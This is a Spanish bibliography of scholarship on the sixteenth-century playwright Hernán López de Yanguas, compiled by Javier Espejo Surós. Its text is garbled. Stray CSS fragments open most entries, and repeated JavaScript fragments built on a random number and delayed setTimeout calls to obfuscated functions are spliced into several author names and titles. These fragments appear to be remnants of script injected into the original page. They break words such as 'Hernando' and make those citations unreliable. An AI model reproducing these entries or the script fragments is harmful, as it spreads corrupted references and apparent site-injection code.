Bibliografía selecta del investigador

Bibliografía selecta sobre Hernán López de Yanguas y su teatro

Realizada por Javier Espejo Surós

Biblioteca Selecta Lopez de Yanguas

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”>BONILLA y SAN MARTÍN, A. (1915), “Fernán López de Yanguas y el bachiller de la Pradilla”, Revista Crítica Hispanoamericana, I, pp. 44-51.

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”> 

COTARELO y MORI, E. (1901), “Fragmentos de una farsa rarísima de principios del siglo XVI”, Revista Española de Literatura, Historia y Arte. I, 1, pp. 140-142.

 

ESPEJO SURÓS, Javier (2002), Algunos aspectos sobre la construcción del personaje en el teatro conservado de Hernán. López de Yanguas (1487-i?)”, Scriptura, núm 17 (2002), pp. 113-131.

 

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”>ESPEJO SURÓS, J. (2004), “Una aproximación al espacio y el tiempo real e imaginario en el teatro conservado de Hernán López de Yanguas”, en María Luisa Lobato y Francisco Domínguez Matito (eds.), Memoria de la palabra. Actas del VI Congreso de la Asociación Internacional Siglo de Oro, Madrid / Frankfurt, Iberoamericana / Vervuert, 2004, pp. 751-761.

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”> 

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”>ESPEJO SURÓS, J. (2007), “Notas sobre la voz, los gestos y los movimientos escénicos del loco festivo: la Farsa del Mundo y Moral de Hernán López de Yanguas”, en Germán Vega García-Luengos y Rafael González Cañal (eds.), Locos, figurones y quijotes en el teatro de los Siglos de Oro. Actas del XII Congreso de la AITENSO (Almagro, 15 al 17 de julio de 2005), Almagro, Universidad de Castilla-La Mancha, 2007, pp. 109-122.

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”> 

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”>ESPEJO SURÓS, J. (2007), “Teatro religioso y dimensión afectiva: ensayo de interpretación”, Javier Espejo Surós y Jesús G. Maestro (eds.), en Teatro religioso y corrientes de espiritualidad en tiempos de Hernán López de Yanguas, Vigo, Ed. Academia, 2007, pp. 91-108.

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”> 

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”>ESPEJO SURÓS, J. (2008), “Cuerpo y gesto en el teatro moral renacentista: la Farsa de la concordia, circa 1529”, Teatro de palabras, 2, 2008, pp. 71-92.

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”> 

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”>ESPEJO SURÓS, J. (2010), “Hernán López de Yanguas (1487 – ca. 1550)”, en Pablo Jauralde (Dir.); Delia Gavela, P. C. Rojo, Elena Varela (Coords.), Diccionario Filológico de Literatura Española. Siglos XVI y XVII. Textos y Transmisión, Madrid, Castalia, pp. 585-591.

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”> 

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”>ESPEJO SURÓS, J. (2012), “El teatro religioso como artefacto mnemotécnico: notas para una poética de la sacra memoria en el teatro de Hernán López de Yanguas”, en L. González (ed.), Miscelánea filológica en homenaje al profesor Albert Porqueras Mayo, Lleida, Lleida, Ed. Milenio, pp. 73-81.

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”> 

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”>ESPEJO SURÓS, J. y Hernandom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}ando, J. F. (2002), “La Farsa Turquesana de Hernán López de Yanguas (ca. 1530)”. en Lemir, textos medievales y renacentistas, Universitat de València, 2002. tos/FarsaTurquesana/Index.htm”>Enlace

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”> 

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”>ESPEJO SURÓS, J. y Hernandom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}ando, J. F. (2012), Diálogo del Mosquito de Hernán López de Yanguas, Madrid, EdoBNE-Musa a las 9, 2013.

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”> 

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”>ESPEJO SURÓS, J. y Hernandom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}ando, J. F. (2012), Triumphos de Locura de Hernán López de Yanguas, Madrid, EdoBNE-Musa a las 9, 2012.

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”> 

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”>ESPEJO SURÓS, J. y Maestro, J. G. (2007), Teatro religioso y corrientes de espiritualidad en tiempos de Hernán López de Yanguas, Vigo, Ed. Academia

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”>GAYA NUÑO, J. A. (1952), “Dos reliquias sorianas de arte y literatura en Cataluña”, Celtiberia, 3, p. 32-39.

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”> 

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”>GONZÁLEZ OLLÉ, F. (ed.) (1967).  Fernán López de Yanguas, Obras dramáticas. Madrid, Espasa Calpe.

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”> 

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”>GONZÁLEZ OLLÉ, F. (1967b), “El primer auto sacramental del teatro español”, Segismundo, 5-6, pp. 179-84.

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”> 

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”>GONZÁLEZ OLLÉ, F.  (1975), “Sobre el texto de la Égloga de la Natividad, de Fernán López de Yanguas”, Segismundo, 21-22, pp. 61-63.

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”> 

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”>HERMENEGILDO, A. (2002), “Hernán López de Yanguas”, en R. de la Fuente y J. Amezúa (eds.), Diccionario del teatro iberomericano, Salamanca, Ediciones Almar, p. 225.

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”> 

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”>HERNANDO, J. F. (1996), “Tiempo dramático, tiempo real y tiempo simbólico en las obras dramáticas de Hernán López de Yanguas”, Bulletin of the Comediantes, 49, 2, pp. 249-59.

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”> 

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”>HERNANDO, J. F. (1997), “Escritura y Teatro en el s. XVI. Subtextualidad bíblica en la obra dramática de Hernán López de Yanguas (1487-?)”, Helmántica, 147, pp. 453-65.

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”> 

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”>IGLESIAS, A. (2007), “Una lectura dramatizada de la Farsa del mundo y moral de Hernán López de Yanguas”, J. Espejo Surós & Jesús G. Maestro (eds.), Teatro religioso y corrientes de espiritualidad en tiempos de Hernán López de Yanguas, Vigo, Editorial Academia del Hispanismo, pp. 55-59.

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”> 

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”>MERINO NUÑO, C. (1973), La adjetivación en cuatro obras dramáticas de Hernán López de Yanguas y su comparación con la de Juan de Mena en el ‘Laberinto de Fortuna’, Tesis de licenciatura dirigida por la Dra. Luisa López Grigera. Universidad de Deusto.

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”> 

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”>MICHAËLIS de VASCONCELLOS C. (1919), “Alusiones poéticas a la Purísima Concepción en una égloga de Hernandom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}ando de Yanguas, en las Cantigas del rey Sabio y en Fernán Caballero”, Lusa, 11, pp. 145-146.

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”> 

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”>PÉREZ GÓMEZ, A. (1960) (ed.), Cuatro obras del bachiller Hernán López de Yanguas, siglo XVI, Cieza, “La Fonte que mana y corre”, Ayre de la almena, Textos literarios rarísimos, 3.

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”> 

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”>PÉREZ-RIOJA, J. A. (1968), “Hernán López de Yanguas: humanista y autor dramático”, Celtiberia, 36, pp. 163-182.

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”> 

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”>STERN, CH. (1999), “López de Yanguas”, en R. W. Vince (ed.), A Companion to the Medieval Theatre, New York, Greenwood Press, pp. 216-217.

tospace: none; margin: 0cm 0cm .0001pt 35.45pt;”> 

YOUNG, R. A. (1974), “The Farsa del Mundo y Moral of Fernán López de Yanguas andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and the Auto Sacramental”, Segismundo, 19-20, pp. 9-16.